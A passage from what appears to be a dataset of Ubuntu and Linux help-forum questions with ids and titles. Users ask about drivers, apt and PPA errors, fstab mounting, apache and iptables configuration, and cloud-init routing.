bluetooth adapter was n't supporting the a2dp profile of my audio source . ( not acting like a sink ) then i saw that the same issue has been experienced by many people upgrading from bluez4 to bluez5 . the issue also was posted on the bluez mailing list . so far , i have n't found a way to add this protocol to my adapter .
440387	problem ( 13.10 ) : external monitor not working [ - nouveau-driver on macbook pro ]	i am using ubuntu 13.10 on a macbook pro . would like to install external monitor vga with the mini-port . no success . trying : settings→displays - nothing recognised . trying xrandr -- auto - nothing there is no xorg.conf on my ubuntu . in use 2 graphic drivers : vga compatible controller intel corporation 3rd gen core vga compatible controller nvidia corporation gk107m and , opengl vendor string : nouveau what should i do to activate the external monitor ( need for beamer presentations ) ?
440388	how can i add ppa : webupd8team/java to my repository with there are certificate errors ?	i know this question has had a lot of attention and i would n't ask unless previous answers would n't work . i have tried each of the responses at these questions : http : //ubuntuforums.org/showthread.php ? t=2113326 ( reinstalling ca-certificates ) add-apt-repository returns unexpected length error ( adding repository to source.list ) gpg `` no_pubkey '' errors for libreoffice and mozilla ppas ( add the key ) w : gpg error : http : //ppa.launchpad.net precise release : the following signatures could n't be verified because the public key is not available : ( add the key ) i ca n't add ppa repository behind the proxy ( similar to the previous two links ) is there anything i can do ? i just want to be able to apt-get install oracle-java8-installer but the package ca n't be found is all i get and then i am unable to add the repository webupd8team/java to my system . what do i need to do get this working ?
440389	just finished installing ubuntu desktop 13.10 , mouse clicking problem	installed on my macbook pro early 2011 , and i 've encountered this problem before where my mouse will move around the screen but wo n't select anything . i ca n't click to navigate anything and all has to be done through my keyboard . just a little frustrating . any help ? update : i found the problem to be linked to my mad catz gaming mouse . when i have it plugged in , the cursor does as mentioned , but when i unplug it , everything 's fine . but in-case this problem ever happens to me , an answer will still work for me .
440390	internet and apt-get very slow	i am using xubuntu 13.10 right now and i have some internet problems . when i use apt-get it takes almost forever to download just a few kbytes . i get results like these and it pauses there for a long time : jens @ ultrabuch : ~ $ sudo apt-get update [ sudo ] password for jens : ign http : //extras.ubuntu.com saucy inrelease holen : 1 http : //extras.ubuntu.com saucy release.gpg [ 72 b ] ok http : //extras.ubuntu.com saucy release ok http : //extras.ubuntu.com saucy/main sources ok http : //extras.ubuntu.com saucy/main amd64 packages ok http : //extras.ubuntu.com saucy/main i386 packages ign http : //extras.ubuntu.com saucy/main translation-de_de ign http : //extras.ubuntu.com saucy/main translation-de ign http : //extras.ubuntu.com saucy/main translation-en ign http : //archive.canonical.com saucy inrelease ok http : //archive.canonical.com saucy release.gpg ok http : //archive.canonical.com saucy release ok http : //archive.canonical.com saucy/partner amd64 packages ok http : //archive.canonical.com saucy/partner i386 packages ign http : //archive.canonical.com saucy/partner translation-de_de ign http : //archive.canonical.com saucy/partner translation-de ign http : //archive.canonical.com saucy/partner translation-en 96 % [ verbindung mit archive.ubuntu.com ( 2001:67c:1360:8c01 : :18 ) it appears to me that these freezes are caused by `` translation '' packages , they are always ignored . i tried to change the server as well , that did n't work either , as can be seen below . when i reload synaptic i get this message : could not download all repository indexes the repository may no longer be available or could not be contacted because of network problems . if available , an older version of the failed index will be used . otherwise , the repository will be ignored . check your network connection and ensure the repository address is correct in 'repositories ' under 'settings ' . failed to fetch http : //archive.canonical.com/ubuntu/dists/saucy/inrelease some index files failed to download . they have been ignored , or old ones used instead . i 'd be very happy if someone could help me with that ! best regards , jens output of ifconfig -a : eth0 link encap : ethernet hardware adresse 50 : b7 : c3:07:35:1e up broadcast multicast mtu:1500 metrik:1 rx-pakete:0 fehler:0 verloren:0 überläufe:0 fenster:0 tx-pakete:0 fehler:0 verloren:0 überläufe:0 träger:0 kollisionen:0 sendewarteschlangenlänge:1000 rx-bytes:0 ( 0.0 b ) tx-bytes:0 ( 0.0 b ) lo link encap : lokale schleife inet adresse:127.0.0.1 maske:255.0.0.0 inet6-adresse : : :1/128 gültigkeitsbereich : maschine up loopback running mtu:65536 metrik:1 rx-pakete:2440 fehler:0 verloren:0 überläufe:0 fenster:0 tx-pakete:2440 fehler:0 verloren:0 überläufe:0 träger:0 kollisionen:0 sendewarteschlangenlänge:0 rx-bytes:211909 ( 211.9 kb ) tx-bytes:211909 ( 211.9 kb ) wlan0 link encap : ethernet hardware adresse c8 : f7:33:11:38:70 inet adresse:192.168.2.105 bcast:192.168.2.255 maske:255.255.255.0 inet6-adresse : fe80 : :caf7:33ff : fe11:3870/64 gültigkeitsbereich : verbindung inet6-adresse : 2003:66:8807 : c620:456b:7fc9:1041:7cc9/64 gültigkeitsbereich : global inet6-adresse : 2003:66:8807 : c620 : caf7:33ff : fe11:3870/64 gültigkeitsbereich : global up broadcast running multicast mtu:1500 metrik:1 rx-pakete:28809 fehler:0 verloren:0 überläufe:0 fenster:0 tx-pakete:18907 fehler:0 verloren:0 überläufe:0 träger:0 kollisionen:0 sendewarteschlangenlänge:1000 rx-bytes:32338097 ( 32.3 mb ) tx-bytes:3088377 ( 3.0 mb ) partial output of apt-fast : hit http : //ftp-stud.hs-esslingen.de saucy-security/restricted translation-en hit http : //ftp-stud.hs-esslingen.de saucy-security/universe translation-en ign http : //ftp-stud.hs-esslingen.de saucy-backports/main translation-en_gb ign http : //ftp-stud.hs-esslingen.de saucy-backports/main translation-de ign http : //ftp-stud.hs-esslingen.de saucy-backports/multiverse translation-en_gb ign http : //ftp-stud.hs-esslingen.de saucy-backports/multiverse translation-de ign http : //ftp-stud.hs-esslingen.de saucy-backports/restricted translation-en_gb ign http : //ftp-stud.hs-esslingen.de saucy-backports/restricted translation-de ign http : //ftp-stud.hs-esslingen.de saucy-backports/universe translation-en_gb ign http : //ftp-stud.hs-esslingen.de saucy-backports/universe translation-de ign http : //ftp-stud.hs-esslingen.de saucy-security/main translation-en_gb ign http : //ftp-stud.hs-esslingen.de saucy-security/main translation-de ign http : //ftp-stud.hs-esslingen.de saucy-security/multiverse translation-en_gb ign http : //ftp-stud.hs-esslingen.de saucy-security/multiverse translation-de ign http : //ftp-stud.hs-esslingen.de saucy-security/restricted translation-en_gb ign http : //ftp-stud.hs-esslingen.de saucy-security/restricted translation-de ign http : //ftp-stud.hs-esslingen.de saucy-security/universe translation-en_gb ign http : //ftp-stud.hs-esslingen.de saucy-security/universe translation-de 98 % [ connecting to archive.canonical.com ( 2001:67c:1360:8c01 : :16 ) ] >
440394	ffmpeg on linux video size in preset	hi everyone i am trying to create a preset to encode my videos with ffmpeg through this file : # video options s=716x402 vcodec=libx264 minrate=900k maxrate=1100k bufsize=1500k vprofile=high level=4 field_order=progressive # audio options acodec=libfdk_aac b : a=44.1k # metada options movflags=faststart but it does n't accept the first line `` s=716x402 '' and returns this error : invalid option or argument : 's=716x402 ' , parsed as 's ' = '716x402' if i remove that line everything goes smoothly but fact is that i need to change the size of the output . i know that in the command line this > ffmpeg -i input.mov -vcodec libx264 -acodec copy -s 716x402 output.flv works so i 'm guessing there is another way of telling the video size in a preset file . does anyone know how ? please take notice that i 'm calling this preset through the -fpre flag inside the ffmpeg comand line thank you in advance !
440396	apache .htaccess settings for mapping requests on shared servers	i want the following structure : | -- - public_html | -- - dist | | -- - index.html | | -- - style.css | | -- - script.js | | -- - blog | | | -- - index.html | -- - index.php | -- - .htaccess and for apache to look first in /dist/ to see if there 's a match , then if not to use /index.php . how can i get apache to do this via the .htaccess ? but i do n't want it just to redirect , but to serve the /dist/ files as if they were in the web root , so : example.com/blog is served as such , but using the file from example.com/dist/blog/index.html . i 've had a good look through the documentation but i 'm confused with the seemingly myriad ways of redirecting and mapping in apache . which module would i use to do this ?
440398	finding storage pool/volume path using virsh	i have a few questions about storage pools and volumes in kvm . is there a way to get storage volumes ' paths via virsh ? how do i associate a storage pool to the path it is located in ? both virsh pool-info or pool-list do n't provide this information . what is a good way to assign/attach volumes to a vm via virsh ? thank you !
440400	ubuntu 13.10 video does n't load when i login after i changed the driver	i just changed the video driver and when i tried to login again , the desktop does n't load anymore . is there a way ( a command ) i can return to the other option ( the recommeded one ) with the text mode ? thank you .
440403	stream webcam via command line to vlc	i 've spent the morning doing searches and ca n't find any tutorials on how to stream my webcam ( with sound ) so i can watch it remotely on vlc . i have avconv installed , and can stream to twitch just fine , but ca n't for the life of me find how to stream so i can stream directly to vlc . i 've found a cvlc command that i can stream just fine , but it does n't any sound .
440404	how can i avoid saving my irssi ( irc ) password in plain text ( yet still log in automatically ) ?	i have this line in my irssi config file : autosendcmd = `` /msg nickserv identify [ my-password-here ] ; wait 2000 '' ; i like being able to log in automatically , but i 'd rather not save my password in plain text . is there a way to do that ?
440407	running a service ignores environment variables	i have a /ect/init/application.conf file that looks something like ... start on filesystem and net-device-up iface ! =lo stop on runlevel [ 016 ] respawn export node_env=production chdir /home/richie/application exec /home/richie/.nvm/v0.10.26/bin/node server/app > > /var/log/node.log 2 > & 1 it is meant to run a node.js application in production mode . however , when i run the application as a service : sudo service application start it outputs this data in the log when i output my environment variables : { upstart_instance : '' , upstart_job : 'application ' , term : 'linux ' , path : '/usr/local/sbin : /usr/local/bin : /usr/bin : /usr/sbin : /sbin : /bin ' , pwd : '/home/richie/application ' } as you can see , node_env does not exist in the list of environment variables . any idea why my exported environment variable would be ignored ? i also have added into my /etc/environment file : node_env=production thanks in advance !
440408	using iptables to restrict vpn user access to internal network	so say i have a set up in which a single server running virtual machines and a pptpd server . the pptpd server hands out ip addresses in the 192.168.0.0/24 range . the virtual machines have ip addresses in the 192.168.100.0/24 range . my question is : how can i restrict access for each vpn user to a single virtual machine ? so : vpn user 192.168.0.50 can only access virtual machine 192.168.100.50 . i have tried the input and forward rules with drop all and allow the specific paths , but they seem to take zero effect . please suggest what are my options . thank you !
440411	how do i disable home directory encryption during ubuntu 12.04 installation ?	when attempting to install ubuntu 12.04 from a cd , there is an option displayed for `` encrypt my home folder '' . the option is checked ( enabled ) by default , but it is grayed out , so it is impossible to uncheck it . i do not want my home folder encrypted . how do i disable this option before installation ? please note that this is not the same as asking how to revert home folder encryption after installation . the following post explains how to do that : how to stop using built-in home directory encryption ? a related post ( 9922 ) seems to have been trying to ask exactly the question that i am asking , but was erroneously marked as a duplicate of 4950 . hence , the link to 9922 now erroneously forwards to article 4950 : how do i disable the home encryption offered during install ? edit : i am using the 64bit desktop image ubuntu-12.04.4-desktop-amd64.iso downloaded from http : //www.ubuntu.com/download/desktop
440412	dev box : no swap space to speed up oom killer	the tldr : i do bad moves that flood the ram , i 'm curious whether having no swap would spare me the half hour wait for the oom killer . before deploying a few machines with a hacky config , i 'd like the community 's grain of salt . details : usually , i choose my swap space based on the installed ram and expected workload , as discussed over and over ( and over , and over ) . now here 's the twist : i 'm preparing a few workstations for software development . the tools we develop are quite memory intensive . during dev , we sometimes screw up here and there and when we launch our tests , we flood the ram and bring our system to it 's knees . the dev work itself would be comfortable on a 4gig machine , but have 16 to 32 available for tests . tests should not , however , go big enough to seriously swap . whenever they do , it 's a bug and would not mind for my test to fail fast . my rational here is that without swap , the oom killer will kick in while everything is still happening at ram speed , which would reduce the chances of having a dev pull on the power cord . anyone with better understanding of linux memory management can tell me if this is a good approach ?
440413	my wireless mouse is not working after reboot on ubuntu 14.04	if i reboot my computer with the bluetooth micro-receiver of my mouse pluged in a usb , when it boots it does n't recognise my mouse . ( before the reboot the mouse was working properly ) if i shutdown the laptop and boot it again ( without unpluging the reciever ) , it recognises the mouse properly . i 'm using ubuntu 14.04 beta 2 64bit with the latest package updates till today , on a lenovo g510 laptop . mouse : logitech m185 wireless mouse laptop : lenovo g510 i7 4700mq , 8gb ram , 128gb ssd samsung evo 840. lsb_release -rd description : ubuntu trusty tahr ( development branch ) release : 14.04 $ uname -r 3.13.0-19-generic dmesg after reboot dmesg after shutdown and reboot lspci after reboot lspci after shutdown and reboot lsusb after reboot lsusb after shutdown and reboot as you can see in the two lsusb files , it is not only my mouse not recognised but no other usb device . i do n't know in which package to file a bug report in launchpad , so i 'm refering to you .
440416	upgrade problem in linux headers	i was upgrading my ubuntu , when it stop when the upgrade was config linux headers . can i restart the pc ? 2014-03-28 14:19:32 configure lightdm : amd64 1.8.5-0ubuntu1 2014-03-28 14:19:32 status unpacked lightdm : amd64 1.8.5-0ubuntu1 2014-03-28 14:19:32 status unpacked lightdm : amd64 1.8.5-0ubuntu1 2014-03-28 14:19:32 status unpacked lightdm : amd64 1.8.5-0ubuntu1 2014-03-28 14:19:32 status unpacked lightdm : amd64 1.8.5-0ubuntu1 2014-03-28 14:19:32 status unpacked lightdm : amd64 1.8.5-0ubuntu1 2014-03-28 14:19:32 status unpacked lightdm : amd64 1.8.5-0ubuntu1 2014-03-28 14:19:32 status unpacked lightdm : amd64 1.8.5-0ubuntu1 2014-03-28 14:19:32 status unpacked lightdm : amd64 1.8.5-0ubuntu1 2014-03-28 14:19:33 status unpacked lightdm : amd64 1.8.5-0ubuntu1 2014-03-28 14:19:33 status unpacked lightdm : amd64 1.8.5-0ubuntu1 2014-03-28 14:19:33 status unpacked lightdm : amd64 1.8.5-0ubuntu1 2014-03-28 14:19:33 status unpacked lightdm : amd64 1.8.5-0ubuntu1 2014-03-28 14:19:33 status unpacked lightdm : amd64 1.8.5-0ubuntu1 2014-03-28 14:19:33 status unpacked lightdm : amd64 1.8.5-0ubuntu1 2014-03-28 14:19:33 status half-configured lightdm : amd64 1.8.5-0ubuntu1 2014-03-28 14:19:35 status installed lightdm : amd64 1.8.5-0ubuntu1 2014-03-28 14:19:35 configure linux-image-3.11.0-18-generic : amd64 3.11.0-18.32 < none > 2014-03-28 14:19:35 status unpacked linux-image-3.11.0-18-generic : amd64 3.11.0-18.32 2014-03-28 14:19:36 status half-configured linux-image-3.11.0-18-generic : amd64 3.11.0-18.32 https : //imageshack.com/i/jwbcpjp
440418	directory /etc/x11/x is empty ! login directs to tty	i have ubuntu 12.04 lts and my pc is down for a long time . not like with hardware . i have asked a few questions about this . here are their links . ctrl+alt+f7 and ctrl+alt+f8 not changing back into the x session ! how do i bypass the tty login on ubuntu 12.04 lts and what is it ? so . now i realised that the x directory is empty . any one knows how to add a symbolic link to the directory ? i have tried startx . it says no symbolic link . please help .
440422	cgi-bin not found in the /usr/lib/ folder	i am using ubuntu 12.04 and i want to try to create soft link of /usr/lib/cgi-bin to /var/www/ to execute my perl program . but there is an error to create the link : the /usr/lib/cgi-bin folder is not there please reply asap with one way solution .
440423	how can i upgrade ubuntu lts to the next one offline ?	i 'm using ubuntu 12.04 on my computer and i want to upgrade to ubuntu 14.04 . i do not have internet at home , so i need to do the upgrade offline . on opensuse there a way to make the upgrade offline simple and effective way is by using the iso dvd . my question is : is there any way to make ubuntu upgrade offline as in opensuse ?
440427	installing python 3.4 from source	i am running xubuntu 13.10 i386 with the python ( 2.7 ) and python3 ( 3.3 ) packages installed . i have downloaded and compiled the source code for python 3.4 but the binary file is named python . how can i install it as python34 ? do i change the name of the binary file and do sudo make install ?
440428	ubuntu upgrade from 12.04 to 12.10 crashed and now /home partition wo n't mount at bootup	i tried to upgrade my wife 's packard bell netbook running lubuntu 12.04 lts to 12.10 . it all ran smoothly until after the downloading of packages and requesting i confirm that some will be removed , added etc . when i returned after leaving it to do it 's thing , i had a black screen with a lot of text which unfortunately i did not note down although it was very cryptic . i do remember that it was mentioning something about the kernel , although if this is the problem i do n't know . i had to hard reboot and tried the recovery mode . i managed to get to a root shell and noticed that it is not a problem of disk space . before the upgrade there was over 3gb on / , and now there is about 2gb . what is strange though is that the /home does not get mounted automatically at bootup . i tried various schemes as reported below to get it mounted automatically without any success . i then tried various options such as : fsck dpkg network root grub system-summary = reports no /home directory each time it asks me to mount all the filesystem in fstab and when i confirm it stops at mountall : mount /home/mywife/etc/etc/ terminated with status 1 it says such as in place of etc/etc/ documents music media pictures and so on . i tried to find the solution suggested in various forums including this one but with no exact situation like mine . help will be much appreciated . the /etc/fstab below : # /etc/fstab : static file system information . # # use 'blkid -o value -s uuid ' to print the universally unique identifier # for a device ; this may be used with uuid= as a more robust way to name # devices that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 /dev/sda1 / ext4 errors=remount-ro 0 1 # /home was on /dev/sda5 during installation uuid=b2c60910-ff66-4713-a629-37c293b62393 /home ext4 defaults 0 2 # /dev/sda2 none swap sw 0 0 /dev/mapper/cryptswap1 none swap sw 0 0 192.168.2.2 : /home/ericam/documents /home/ericam/media/documents nfs timeo=14 , intr , rsize=8192 , wsize=8192 0 0 192.168.2.2 : /home/ericam/pictures /home/ericam/media/pictures nfs timeo=14 , intr , rsize=8192 , wsize=8192 0 0 192.168.2.2 : /home/ericam/music /home/ericam/media/music nfs timeo=14 , intr , rsize=8192 , wsize=8192 0 0 this does seem a bit strange.this is the 1st time i see the /cryptswap and mounting to the ../media/.. directory ! there does n't seem to be any older or backup fstab which would show up the differences . running `` df '' as root brings up the following : df : `/run/user ' : no such file or directory filesystem 1k-blocks ... ... .. use % mounted on /dev/sda1 ... ... ... ... ... ... 79 % / udev ... ... ... ... ... ... 0 % /dev none ... ... ... ... ... ... 1 % /run/lock none ... ... ... ... ... ... 1 % /run/shm i had to type it out so bear with the ... .. bit . here is the output for the lsblk command : name maj : min rm size ro type mountpoint sda 8:0 0 232.9g 0 disk ├─sda1 8:1 0 9.3g 0 part / ├─sda2 8:2 0 2.8g 0 part ├─sda3 8:3 0 1k 0 part └─sda5 8:5 0 220.8g 0 part sdb 8:16 1 1.9g 0 disk └─sdb1 8:17 1 1.9g 0 part /mnt note that sdb is the usb stick i used to copy over the data . i might add that i used the mount command . after a few days i tried the following : the fstab was changed to this : # /etc/fstab : static file system information . # # use 'blkid -o value -s uuid ' to print the universally unique identifier # for a device ; this may be used with uuid= as a more robust way to name # devices that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # /dev/sda1 / ext4 errors=remount-ro 0 1 uuid=d7ae9306-1dac-416e-8d59-1055ada63c48 / ext4 errors=remount-ro 0 1 # /home was on /dev/sda5 during installation # /dev/sda5 /home ext4 defaults 0 2 uuid=b2c60910-ff66-4713-a629-37c293b62393 /home ext4 defaults 0 2 /dev/sda2 none swap sw 0 2 # /dev/mapper/cryptswap1 none swap sw 0 0 # 192.168.2.2 : /home/ericam/documents /home/ericam/media/documents nfs timeo=14 , intr , rsize=8192 , wsize=8192 0 0 # 192.168.2.2 : /home/ericam/pictures /home/ericam/media/pictures nfs timeo=14 , intr , rsize=8192 , wsize=8192 0 0 # 192.168.2.2 : /home/ericam/music /home/ericam/media/music nfs timeo=14 , intr , rsize=8192 , wsize=8192 0 0 i have amended the fstab after this questions advice : my /home is not mounted after 12.04 upgrade i changed the lines to include the uuid which are correct . i checked ... the command 'fdisk -l ' shows : disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x3e751ccc device boot start end blocks id system /dev/sda1 * 2048 19531775 9764864 83 linux /dev/sda2 482537472 488396799 2929664 82 linux swap / solaris /dev/sda3 19533822 482535423 231500801 5 extended /dev/sda5 19533824 482535423 231500800 83 linux partition table entries are not in disk order disk /dev/sdb : 2002 mb , 2002780160 bytes 62 heads , 62 sectors/track , 1017 cylinders , total 3911680 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0001dbd4 device boot start end blocks id system /dev/sdb1 * 62 3909347 1954643 c w95 fat32 ( lba ) it still wo n't mount at bootup ... ..
440430	how to qt-faststart multiple files ?	several of my albums have their metadata at the end of the files . this is fine until you actually want to stream one of them to a network media player . the player either dumps out or complains . thankfully there 's a little tool that can suck the data up from the end and inject it at the front . less good is its syntax . this is the only format it accepts : qt-faststart < infile.mov > < outfile.mov > there 's no option for passing it a directory . no option for multiple files . no option for in-place fixing . how can i make a command like this work for my files , assuming i want to handle every file in a directory with the same , given extension ?
440432	how to train tesseract ocr engine	i was wondering how to train tesseract ocr engine , saw some video 's people using some gui and some uses command-line with some saved file 's . i want to know how to train the engine/make these file's best regards
440433	extracting information from text file	i have a following scenario to do in a text file . i have a large text file which gets generated from my server and includes the following information . a ) lots of garbage data in ascii with some ip addresses of computers connected to the server . b ) ip address is not written in whole instead it is like this sfafaffs @ 192 @ sdsfa @ 168 @ dfs8989090sdffsff0.09sf @ 90 @ 90dsaaqw @ 1 @ . that is ip is in enclosed in the @ tags my goal is to make a text file which will print the ip with corresponding counter variable showing occurrences of particular ip . how to approach to solve this problem.please also guide me do n't post solution since that will limit my abilites . for example if next time i am faced with other problem related with this what would i do ? so please advise me what should be strategy to solve these types of problems ?
440434	trying to install call flow application ... keeps failing	has anyone tried to install callflow ? http : //www.voip-info.org/wiki/view/callflow i downloaded the tar file and extracted everything to : /home/jj/documents/callflow-20120624-180 $ i followed the first set of instructions in the install file and ended up with : jj @ joshua : ~/documents/callflow-20120624-180/build $ sudo find / -name callflow* /callflow /callflow/callflow.conf /usr/local/bin/callflow /usr/local/share/callflow /usr/local/share/callflow/js/callflow.js /usr/local/share/callflow/css/callflow.css /usr/local/share/callflow/scripts/callflow.awk /usr/local/share/man/man1/callflow.1 /home/jj/documents/callflow-20120624-180 /home/jj/documents/callflow-20120624-180/js/callflow.js /home/jj/documents/callflow-20120624-180/callflow /home/jj/documents/callflow-20120624-180/css/callflow.css /home/jj/documents/callflow-20120624-180/conf/callflow.conf /home/jj/documents/callflow-20120624-180/man/callflow.1 /home/jj/documents/callflow-20120624-180/scripts/callflow.awk /home/jj/downloads/callflow-20120624-180.tar.bz2 /home/jj/.local/share/trash/info/callflow.trashinfo /home/jj/.local/share/trash/files/callflow /share/doc/callflow when i try to run the file in the bin folder , i get an error message : callflow : error : setup directory `` /usr/local/callflow '' does not exist adjust your configuration i 've searched and i see that it installed / created 2 conf files : jj @ joshua : ~/documents/callflow-20120624-180/build $ sudo find / -name callflow.conf /callflow/callflow.conf /home/jj/documents/callflow-20120624-180/conf/callflow.conf jj @ joshua : ~/documents/callflow-20120624-180/build $ they both have the set up directory set to /home/jj/documents/callflow-20120624-180 i do n't really know what i 'm supposed to do to get this going ... any suggestions would be appreciated .
440435	need script for ubuntu	need a script to use in ubuntu i 've bunch of .tgz folders in folder a , each tgz is having some files and tar files , inside the tar files there are folders and sub folders . wants to move a particular files from all these tgz , tar , folders/sub folders to a new directory eg : below the directory structure ( inside abc bunch tgzs are there with different dates abc\log_021403.tgz\log_021403\log_archive_130214.tar+test.log and folders like \start\collect\log\link\failure\test.log . wants to get only test.log files to a folder
440438	thinking of switching to ubuntu !	will ubuntu completely remove all my driver data ? will i have to re-download all of my nvidia graphics drivers and even my wireless drivers ? will i be able to connect to the internet right away to do so even though i have completely replaced windows 7 ?
440439	netbeans 7.0.1 missing display window	since a few days , my netbeans application window is missing from the screen . when i try to launch it , only the application icon appears in the launcher , but when i click on it , nothing happens . when i try to launch it from a terminal command , no errors are returned . i also tried to reinstall , but the problem remains .
440443	installing xubuntu-desktop breaks cloud-init ( routing to 169.254.169.254 )	run ubuntu server 12.04 ( or a later version ) in a vm . reboot . cloud-init continues to work . then install xubuntu-desktop . then reboot ; you will see that there is now a broken route to the link-local ipv4 address ( 169.254.169.254 ) , which breaks cloud-init . details follow . here is an excerpt from a successful reboot before installing xubuntu-desktop : ... cloud-init start-local running : fri , 28 mar 2014 15:24:45 +0000 . up 3.46 seconds no instance data found in start-local ci-info : lo : 1 127.0.0.1 255.0.0.0 . ci-info : eth0 : 1 10.10.0.136 255.255.0.0 fa:63:63 : c3:0c : b0 ci-info : route-0 : 0.0.0.0 10.10.0.1 0.0.0.0 eth0 ug ci-info : route-1 : 10.10.0.0 0.0.0.0 255.255.0.0 eth0 u cloud-init start running : fri , 28 mar 2014 15:24:45 +0000 . up 3.99 seconds found data source : datasourceec2 skipping profile in /etc/apparmor.d/disable : usr.sbin.rsyslogd * starting apparmor profiles [ 80g [ 74g [ ok ] landscape-client is not configured , please run landscape-config . * stopping system v initialisation compatibility [ 74g [ ok ] * starting system v runlevel compatibility [ 74g [ ok ] * starting regular background program processing daemon [ 74g [ ok ] * starting save kernel messages [ 74g [ ok ] * starting deferred execution scheduler [ 74g [ ok ] * starting acpi daemon [ 74g [ ok ] * starting automatic crash report generation [ 74g [ ok ] * stopping save kernel messages [ 74g [ ok ] * starting cpu interrupts balancing daemon [ 74g [ ok ] * stopping system v runlevel compatibility [ 74g [ ok ] * starting execute cloud user/final scripts [ 74g [ ok ] cloud-init boot finished at fri , 28 mar 2014 15:24:58 +0000 . up 16.74 seconds ... now , here is an excerpt from a reboot after installing xubuntu-desktop : ... cloud-init start-local running : fri , 28 mar 2014 18:39:24 +0000 . up 5.10 seconds no instance data found in start-local ci-info : lo : 1 127.0.0.1 255.0.0.0 . ci-info : eth0 : 1 10.10.0.136 255.255.0.0 fa:63:63 : c3:0c : b0 ci-info : route-0 : 0.0.0.0 10.10.0.1 0.0.0.0 eth0 ug ci-info : route-1 : 10.10.0.0 0.0.0.0 255.255.0.0 eth0 u ci-info : route-2 : 169.254.0.0 0.0.0.0 255.255.0.0 eth0 u cloud-init start running : fri , 28 mar 2014 18:39:25 +0000 . up 5.90 seconds 2014-03-28 18:39:28,821 - util.py [ warning ] : 'http : //169.254.169.254/2009-04-04/meta-data/instance-id ' failed [ 3/120s ] : url error [ [ errno 113 ] no route to host ] ( as you can imagine , lots of bad stuff follows ) what is going wrong here , and how do i fix it ?
440445	13.10 and hd 3870 video card not duplicate question	i 've tried every variant of fglrx i can find and the open source ( default ) drivers do not display across hdmi . i successfully got video across hdmi once , but i am unsure what i did to get it , it was something to do with unity 2d , but the system promptly crashed upon the next reboot . if i try this fix , it fails when installing the fglrx-legacy package . i can only install fgrlx , and when i do , it reboots to a black screen with a cursor . i go to console and scrolling errors appear every 2 seconds . so , is it possible to get this specific video card to work with 13.10 ? and if so , how ? it has an i5 3.3ghz and 8 gb of ram . not sure what other information you need as i have been out of the linux game for some time and am trying to get back into it . thank you in advance for any and all help you can offer .
440446	how to understand linux versions	i 'm considering purchasing an expensive board and sdk that `` works with linux '' which i 've learned to my cost to mean `` works with some linux '' . the vendor has asked which kernel version i have . using uname -r i get 3.5.0-47 generic with my ubuntu 12.04 lts i just read that ubuntu 14.04 generic will release with linux 3.3 which appears to be an earlier version . does this really mean that the latest ubuntu uses an earlier linux than an earlier ubuntu ? i 'm confused .
440451	restart of apache2 fails on ubuntu 12.04	i also tried to add webserver localhost to this file sudo nano /etc/apache2/apache2.conf and got this output when i tried to restart apache2 : ubuntu @ webserver : ~ $ sudo service apache2 restart syntax error on line 38 of /etc/apache2/apache2.conf : invalid command 'webserver ' , perhaps misspelled or defined by a module not included in the server configuration action 'configtest ' failed . the apache error log may have more information . ... fail ! below is what was in the sudo nano /etc/apache2/conf.d/fqdn file : webserver localhost i then got this output : ubuntu @ webserver : ~ $ sudo service apache2 restart syntax error on line 1 of /etc/apache2/conf.d/fqdn : invalid command 'webserver ' , perhaps misspelled or defined by a module not included in the server configuration action 'configtest ' failed . the apache error log may have more information . ... fail ! below is what was in the apache error log : [ tue mar 25 12:35:48 2014 ] [ notice ] apache/2.2.22 ( ubuntu ) php/5.3.10-1ubuntu3.10 with suhosin-patch configured -- resuming normal operations [ tue mar 25 12:41:47 2014 ] [ notice ] caught sigterm , shutting down [ tue mar 25 12:41:48 2014 ] [ notice ] apache/2.2.22 ( ubuntu ) php/5.3.10-1ubuntu3.10 with suhosin-patch configured -- resuming normal operations [ tue mar 25 12:44:01 2014 ] [ notice ] apache/2.2.22 ( ubuntu ) php/5.3.10-1ubuntu3.10 with suhosin-patch configured -- resuming normal operations [ tue mar 25 12:53:18 2014 ] [ notice ] caught sigterm , shutting down [ tue mar 25 12:53:19 2014 ] [ notice ] apache/2.2.22 ( ubuntu ) php/5.3.10-1ubuntu3.10 with suhosin-patch configured -- resuming normal operations [ fri mar 28 18:19:42 2014 ] [ notice ] apache/2.2.22 ( ubuntu ) php/5.3.10-1ubuntu3.10 with suhosin-patch configured -- resuming normal operations how can i resolve this issue ?
440455	backup and disaster recovery moving from windows xp	i have recently migrated from windows xp to ubuntu 12.04 lts and am trying to understand how to reproduce the functionality i used in windows for backups , and if possible improve it . i used to run seagate disc wizard ( re-badged acronis i think ) manually once a week to produce a full image backup of my disk on an ntfs external drive , while i continued using the system . this enabled me to restore the whole system in case of a disk crash or virus , and to access individual files simply if required . of course any changes made since the backup would be lost but whole system restore was rare and i did n't mind that level of loss . i ca n't find any way in linux to do a hot full-image backup – is that correct ? failing that i am planning on the following approach : once a week back up all below / to the external drive using rsync . as required do an incremental backup using rsync . these backups will enable me to access individual files – from linux or windows . if i have to restore the whole system i will wipe the disk , recreate ubuntu using the original distribution dvd and then use rsync to restore the whole lot below / . will this approach restore the system to how it was at the last backup ? is there any problem overwriting everything below / while the system is live ? would there be any advantage to using mondo rescue or clonezilla to create a copy of the “core” stuff ? i do n't expect disaster recovery to be required very often so speed is not of the essence , but i do want it to be straightforward and low stress : ) i have read quite a lot of the documentation and forum entries but am struggling a bit to understand these points . any help would be appreciated .
440459	t410 with intel速 ironlake mobile	i have a t410 with intel速 ironlake mobile and i installed ubuntu gnome 13.10 on a partition . my question is does my graphic support 3d/compiz ? please help . thx
